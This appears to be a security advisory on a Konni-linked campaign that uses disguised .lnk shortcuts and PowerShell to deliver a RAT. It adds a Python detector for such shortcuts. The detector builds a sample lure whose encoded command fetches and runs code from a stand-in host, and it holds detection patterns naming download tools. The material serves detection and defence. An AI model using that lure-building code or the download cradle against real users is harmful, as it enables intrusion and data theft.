Multi-Stage malware campaign targeting South Korean entities linked to Konni APT
April 29, 2025
A sophisticated multi-stage malware campaign, potentially linked to the North Korean Konni APT group, has been observed targeting entities primarily in South Korea. The attack begins with a ZIP file containing a disguised .lnk shortcut which, when opened, executes an obfuscated PowerShell script designed to download and run additional malicious payloads. The final payload is a Remote Access Trojan (RAT) that establishes persistent access, collects system information and directory listings, and exfiltrates the data to a compromised Command and Control (C2) server.
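The chain above (ZIP, then a shortcut whose real target is PowerShell) can be triaged statically before anything runs: parse the .lnk, pull out its target, arguments and icon, and look for the loader tells. The script below is an added example written for this page, not Symantec's detection logic and not a sample from the campaign. It implements a minimal MS-SHLLINK reader (header, optional LinkTargetIDList and LinkInfo, StringData) and a set of heuristic indicators; the indicator names, the scoring threshold, the lure file names and the `example.invalid` URL are all assumptions, and the two .lnk files it scans are constructed in-memory rather than taken from any real sample. The parser is general enough to read ordinary shortcuts as well, not only the shape built here.

```python
"""Static triage of .lnk lures inside a ZIP archive (added example, constructed samples)."""
import base64
import io
import re
import struct
import zipfile

# MS-SHLLINK: LinkCLSID 00021401-0000-0000-C000-000000000046 as it is laid out on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight

# LinkFlags bits (MS-SHLLINK 2.1.1) and the StringData sections they announce, in file order
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_DATA = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
               (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"),
               (HAS_ICON, "icon_location"))


def parse_lnk(data):
    """Return show_command plus whichever StringData fields the link carries."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = HEADER_SIZE
    if flags & HAS_ID_LIST:       # LinkTargetIDList: u16 size followed by the item IDs
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:     # LinkInfo: u32 total size that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    for bit, key in STRING_DATA:  # StringData: u16 character count, then the characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        off += 2
        if flags & IS_UNICODE:
            info[key] = data[off:off + 2 * count].decode("utf-16-le", "replace")
            off += 2 * count
        else:
            info[key] = data[off:off + count].decode("cp1252", "replace")
            off += count
    return info


def decode_encoded_command(arguments):
    """-e / -enc / -EncodedCommand carries base64 of UTF-16LE script text; return it decoded."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", arguments, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", "replace")
    except ValueError:
        return ""


def assess_lnk(entry_name, info):
    """Map one parsed link to the (assumed) indicator names it trips."""
    args = info.get("arguments", "")
    target = (info.get("relative_path", "") + " " + args).lower()
    script = (args + " " + decode_encoded_command(args)).lower()
    hits = []
    if re.search(r"\.(pdf|docx?|xlsx?|pptx?|hwpx?|txt|jpe?g)\.lnk$", entry_name, re.I):
        hits.append("double_extension")
    if re.search(r"powershell|pwsh", target):
        hits.append("target_powershell")
    if info["show_command"] == SW_SHOWMINNOACTIVE or re.search(r"-w(?:indowstyle)?\s+h(?:idden)?\b", script):
        hits.append("hidden_window")
    if decode_encoded_command(args):
        hits.append("encoded_command")
    if re.search(r"-e(?:xecutionpolicy|p)\s+bypass", script):
        hits.append("execution_policy_bypass")
    if re.search(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|webclient|bitsadmin|certutil|https?://", script):
        hits.append("download_cradle")
    if re.search(r"\biex\b|invoke-expression", script):
        hits.append("invoke_expression")
    icon = info.get("icon_location", "").lower()
    if "target_powershell" in hits and icon and "powershell" not in icon \
            and re.search(r"winword|excel|acro|hwp|\.pdf|\.docx?|imageres|shell32", icon):
        hits.append("document_icon_disguise")  # looks like a document, launches a shell
    return hits


def scan_zip(zip_bytes):
    """Triage every .lnk in an archive; verdict needs a PowerShell target plus two more tells."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".lnk"):
                continue
            try:
                info = parse_lnk(zf.read(name))
            except ValueError as exc:
                report[name] = {"verdict": "unparseable", "indicators": [str(exc)], "target": ""}
                continue
            hits = assess_lnk(name, info)
            verdict = "suspicious" if "target_powershell" in hits and len(hits) >= 3 else "benign"
            report[name] = {"verdict": verdict, "indicators": hits,
                            "target": info.get("relative_path", "")}
    return report


def build_lnk(relative_path, arguments, icon_location, show_command=1):
    """Minimal Shell Link writer (header + three StringData fields), used only to build samples."""
    flags = HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def sd(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(relative_path) + sd(arguments) + sd(icon_location)


def build_sample_zip():
    """Constructed sample: one document-looking lure that hides PowerShell, one benign link."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
    enc = base64.b64encode(cradle.encode("utf-16-le")).decode()
    lure = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     "-nop -w hidden -ep bypass -enc " + enc,
                     r"C:\Windows\System32\imageres.dll", SW_SHOWMINNOACTIVE)
    benign = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "",
                       r"C:\Windows\System32\notepad.exe")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invitation.pdf.lnk", lure)
        zf.writestr("Notes.lnk", benign)
    return buf.getvalue()


if __name__ == "__main__":
    for name, r in scan_zip(build_sample_zip()).items():
        print(name, r["verdict"], ", ".join(r["indicators"]))
```

Two points worth keeping in mind when adapting this: the encoded-command regex accepts the common `-e`, `-enc` and `-EncodedCommand` spellings but PowerShell also honours other unambiguous prefixes, so treat a miss as "not seen" rather than "absent"; and the verdict threshold is deliberately conservative so that an ordinary admin shortcut that merely runs PowerShell is not flagged on its own.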
Symantec protects you from this threat, identified by the following:
Behavior-based
SONAR.Powershell!g20
SONAR.Powershell!g111
Carbon Black-based
Associated malicious indicators are blocked and detected by existing policies within VMware Carbon Black products. The recommended policy at a minimum is to block all types of malware from executing (Known, Suspect, and PUP) as well as delay execution for cloud scan to get maximum benefit …